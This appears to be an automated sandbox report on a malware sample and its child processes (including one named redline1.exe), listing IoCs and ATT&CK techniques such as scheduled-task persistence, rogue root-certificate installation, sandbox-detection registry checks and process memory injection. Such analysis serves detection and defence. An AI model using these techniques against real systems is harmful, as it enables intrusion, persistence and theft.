sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
1868	sc.exe
4324	sc.exe
656	sc.exe
5820	sc.exe
1596	sc.exe
2668	sc.exe
5696	sc.exe
368	sc.exe
2080	sc.exe
5716	sc.exe
3944	sc.exe
3992	sc.exe
4872	sc.exe
5024	sc.exe
4228	sc.exe
4744	sc.exe
2144	sc.exe
5724	sc.exe
2156	sc.exe
4216	sc.exe
5948	sc.exe
3600	sc.exe
2972	sc.exe
1512	sc.exe
5332	sc.exe
5024	sc.exe
1320	sc.exe
2344	sc.exe
4952	sc.exe
3540	sc.exe
4448	sc.exe
2288	sc.exe
5816	sc.exe
5064	sc.exe
3944	sc.exe
1704	sc.exe
5604	sc.exe
3436	sc.exe
4592	sc.exe
5344	sc.exe
3932	sc.exe
1416	sc.exe
5424	sc.exe
4564	sc.exe
3332	sc.exe
1424	sc.exe
4948	sc.exe
5048	sc.exe
5208	sc.exe
2452	sc.exe
396	sc.exe
1716	sc.exe
3612	sc.exe
428	sc.exe
216	sc.exe
4032	sc.exe
5468	sc.exe
2748	sc.exe
756	sc.exe
1536	sc.exe
5440	sc.exe
4056	sc.exe
3948	sc.exe
1084	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 24 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3592	5832	WerFault.exe	100
6044	3660	WerFault.exe	150
2632	3660	WerFault.exe	150
5208	2436	WerFault.exe	153
6124	3660	WerFault.exe	150
5968	3660	WerFault.exe	150
4792	3660	WerFault.exe	150
4936	3660	WerFault.exe	150
4572	3660	WerFault.exe	150
1940	3660	WerFault.exe	150
4448	4660	WerFault.exe	198
4028	4660	WerFault.exe	198
4604	4660	WerFault.exe	198
5716	4660	WerFault.exe	198
4168	4660	WerFault.exe	198
5764	4660	WerFault.exe	198
2364	4660	WerFault.exe	198
5300	4660	WerFault.exe	198
4452	4660	WerFault.exe	198
5228	1512	WerFault.exe	230
1936	3988	WerFault.exe	276
5608	5944	WerFault.exe	209
776	4660	WerFault.exe	198
3944	3052	WerFault.exe	130

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub1.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exeRegAsm.exewermgr.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
2736	schtasks.exe
4780	schtasks.exe
2276	schtasks.exe
5748	schtasks.exe
3044	schtasks.exe
4508	schtasks.exe
2968	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exeInstall.exewermgr.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
5748	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

4767d2e713f2021e8fe856e3ea638b58.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

keks.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

amers.exeaxplons.exetrf.exekeks.exeredline1.exepowershell.exepowershell.exeaxplons.exey4jvp2Pqh1XudXwrcFu7KGFu.exe4767d2e713f2021e8fe856e3ea638b58.exeFirstZ.exepowershell.exeDDELkA2CYWL1k1yyRwEvNc2K.exeZYBf0ogkuHSq2r9zBCegj8Ge.exepjGjQPhLGvu2xHuMA86i08A7.exepowershell.exereakuqnanrkn.exe

pid	Process
1524	amers.exe
1524	amers.exe
2616	axplons.exe
2616	axplons.exe
2388	trf.exe
2388	trf.exe
5700	keks.exe
5700	keks.exe
4472	redline1.exe
4472	redline1.exe
4472	redline1.exe
4472	redline1.exe
764	powershell.exe
764	powershell.exe
764	powershell.exe
764	powershell.exe
764	powershell.exe
764	powershell.exe
4472	redline1.exe
4472	redline1.exe
5700	keks.exe
5700	keks.exe
5700	keks.exe
5700	keks.exe
2488	powershell.exe
2488	powershell.exe
2488	powershell.exe
4108	axplons.exe
4108	axplons.exe
392	y4jvp2Pqh1XudXwrcFu7KGFu.exe
392	y4jvp2Pqh1XudXwrcFu7KGFu.exe
392	y4jvp2Pqh1XudXwrcFu7KGFu.exe
392	y4jvp2Pqh1XudXwrcFu7KGFu.exe
3288	4767d2e713f2021e8fe856e3ea638b58.exe
3288	4767d2e713f2021e8fe856e3ea638b58.exe
2452	FirstZ.exe
892	powershell.exe
892	powershell.exe
6004	DDELkA2CYWL1k1yyRwEvNc2K.exe
6004	DDELkA2CYWL1k1yyRwEvNc2K.exe
3980	ZYBf0ogkuHSq2r9zBCegj8Ge.exe
3980	ZYBf0ogkuHSq2r9zBCegj8Ge.exe
5232	pjGjQPhLGvu2xHuMA86i08A7.exe
5232	pjGjQPhLGvu2xHuMA86i08A7.exe
892	powershell.exe
2452	FirstZ.exe
2452	FirstZ.exe
6040	powershell.exe
6040	powershell.exe
2452	FirstZ.exe
6040	powershell.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
2452	FirstZ.exe
4780	reakuqnanrkn.exe
5232	pjGjQPhLGvu2xHuMA86i08A7.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

trf.exekeks.exepowershell.exeredline1.exeRegAsm.exe501115.exepowershell.exeCasPol.exey4jvp2Pqh1XudXwrcFu7KGFu.exe4767d2e713f2021e8fe856e3ea638b58.exepowershell.exeDDELkA2CYWL1k1yyRwEvNc2K.exeZYBf0ogkuHSq2r9zBCegj8Ge.exepjGjQPhLGvu2xHuMA86i08A7.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exeexplorer.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exeexplorer.exepowercfg.exepowercfg.exe

description	pid	Process
Token: SeDebugPrivilege	2388	trf.exe
Token: SeBackupPrivilege	2388	trf.exe
Token: SeSecurityPrivilege	2388	trf.exe
Token: SeSecurityPrivilege	2388	trf.exe
Token: SeSecurityPrivilege	2388	trf.exe
Token: SeSecurityPrivilege	2388	trf.exe
Token: SeDebugPrivilege	5700	keks.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	4472	redline1.exe
Token: SeDebugPrivilege	1156	RegAsm.exe
Token: SeLockMemoryPrivilege	4700	501115.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	3172	CasPol.exe
Token: SeManageVolumePrivilege	392	y4jvp2Pqh1XudXwrcFu7KGFu.exe
Token: SeDebugPrivilege	3288	4767d2e713f2021e8fe856e3ea638b58.exe
Token: SeImpersonatePrivilege	3288	4767d2e713f2021e8fe856e3ea638b58.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	6004	DDELkA2CYWL1k1yyRwEvNc2K.exe
Token: SeImpersonatePrivilege	6004	DDELkA2CYWL1k1yyRwEvNc2K.exe
Token: SeDebugPrivilege	3980	ZYBf0ogkuHSq2r9zBCegj8Ge.exe
Token: SeImpersonatePrivilege	3980	ZYBf0ogkuHSq2r9zBCegj8Ge.exe
Token: SeDebugPrivilege	5232	pjGjQPhLGvu2xHuMA86i08A7.exe
Token: SeImpersonatePrivilege	5232	pjGjQPhLGvu2xHuMA86i08A7.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeShutdownPrivilege	2212	powercfg.exe
Token: SeCreatePagefilePrivilege	2212	powercfg.exe
Token: SeShutdownPrivilege	224	powercfg.exe
Token: SeCreatePagefilePrivilege	224	powercfg.exe
Token: SeShutdownPrivilege	5292	powercfg.exe
Token: SeCreatePagefilePrivilege	5292	powercfg.exe
Token: SeShutdownPrivilege	3888	powercfg.exe
Token: SeCreatePagefilePrivilege	3888	powercfg.exe
Token: SeDebugPrivilege	5232	pjGjQPhLGvu2xHuMA86i08A7.exe
Token: SeImpersonatePrivilege	5232	pjGjQPhLGvu2xHuMA86i08A7.exe
Token: SeLockMemoryPrivilege	4592	explorer.exe
Token: SeShutdownPrivilege	3284	powercfg.exe
Token: SeCreatePagefilePrivilege	3284	powercfg.exe
Token: SeShutdownPrivilege	2156	powercfg.exe
Token: SeCreatePagefilePrivilege	2156	powercfg.exe
Token: SeShutdownPrivilege	1504	powercfg.exe
Token: SeCreatePagefilePrivilege	1504	powercfg.exe
Token: SeShutdownPrivilege	1656	powercfg.exe
Token: SeCreatePagefilePrivilege	1656	powercfg.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeShutdownPrivilege	1000	powercfg.exe
Token: SeCreatePagefilePrivilege	1000	powercfg.exe
Token: SeShutdownPrivilege	6096	powercfg.exe
Token: SeCreatePagefilePrivilege	6096	powercfg.exe
Token: SeLockMemoryPrivilege	2344	explorer.exe
Token: SeShutdownPrivilege	5400	powercfg.exe
Token: SeCreatePagefilePrivilege	5400	powercfg.exe
Token: SeShutdownPrivilege	3652	powercfg.exe
Token: SeCreatePagefilePrivilege	3652	powercfg.exe
Token: SeDebugPrivilege	880	powershell.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	5232	powershell.exe
Token: SeLockMemoryPrivilege	5740	explorer.exe
Token: SeShutdownPrivilege	5940	powercfg.exe
Token: SeCreatePagefilePrivilege	5940	powercfg.exe
Token: SeShutdownPrivilege	3204	powercfg.exe
Token: SeCreatePagefilePrivilege	3204	powercfg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

501115.exe

pid	Process
4700	501115.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exeexplorku.exeamers.exeaxplons.exealex.exeRegAsm.exegold.exeinstall.execmd.exe

description	pid	Process	procid_target
PID 5844 wrote to memory of 5184	5844	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe	85
PID 5844 wrote to memory of 5184	5844	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe	85
PID 5844 wrote to memory of 5184	5844	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe	85
PID 5184 wrote to memory of 5036	5184	explorku.exe	96
PID 5184 wrote to memory of 5036	5184	explorku.exe	96
PID 5184 wrote to memory of 5036	5184	explorku.exe	96
PID 5184 wrote to memory of 1524	5184	explorku.exe	97
PID 5184 wrote to memory of 1524	5184	explorku.exe	97
PID 5184 wrote to memory of 1524	5184	explorku.exe	97
PID 1524 wrote to memory of 2616	1524	amers.exe	98
PID 1524 wrote to memory of 2616	1524	amers.exe	98
PID 1524 wrote to memory of 2616	1524	amers.exe	98
PID 5184 wrote to memory of 3404	5184	explorku.exe	99
PID 5184 wrote to memory of 3404	5184	explorku.exe	99
PID 5184 wrote to memory of 3404	5184	explorku.exe	99
PID 2616 wrote to memory of 5832	2616	axplons.exe	100
PID 2616 wrote to memory of 5832	2616	axplons.exe	100
PID 2616 wrote to memory of 5832	2616	axplons.exe	100
PID 5832 wrote to memory of 3904	5832	alex.exe	101
PID 5832 wrote to memory of 3904	5832	alex.exe	101
PID 5832 wrote to memory of 3904	5832	alex.exe	101
PID 5832 wrote to memory of 5140	5832	alex.exe	102
PID 5832 wrote to memory of 5140	5832	alex.exe	102
PID 5832 wrote to memory of 5140	5832	alex.exe	102
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 5832 wrote to memory of 1156	5832	alex.exe	103
PID 1156 wrote to memory of 5700	1156	RegAsm.exe	107
PID 1156 wrote to memory of 5700	1156	RegAsm.exe	107
PID 1156 wrote to memory of 5700	1156	RegAsm.exe	107
PID 1156 wrote to memory of 2388	1156	RegAsm.exe	108
PID 1156 wrote to memory of 2388	1156	RegAsm.exe	108
PID 2616 wrote to memory of 1444	2616	axplons.exe	110
PID 2616 wrote to memory of 1444	2616	axplons.exe	110
PID 2616 wrote to memory of 1444	2616	axplons.exe	110
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 1444 wrote to memory of 740	1444	gold.exe	112
PID 2616 wrote to memory of 4472	2616	axplons.exe	114
PID 2616 wrote to memory of 4472	2616	axplons.exe	114
PID 2616 wrote to memory of 4472	2616	axplons.exe	114
PID 2616 wrote to memory of 5596	2616	axplons.exe	115
PID 2616 wrote to memory of 5596	2616	axplons.exe	115
PID 2616 wrote to memory of 5596	2616	axplons.exe	115
PID 5596 wrote to memory of 6044	5596	install.exe	158
PID 5596 wrote to memory of 6044	5596	install.exe	158
PID 5596 wrote to memory of 6044	5596	install.exe	158
PID 6044 wrote to memory of 3932	6044	cmd.exe	118
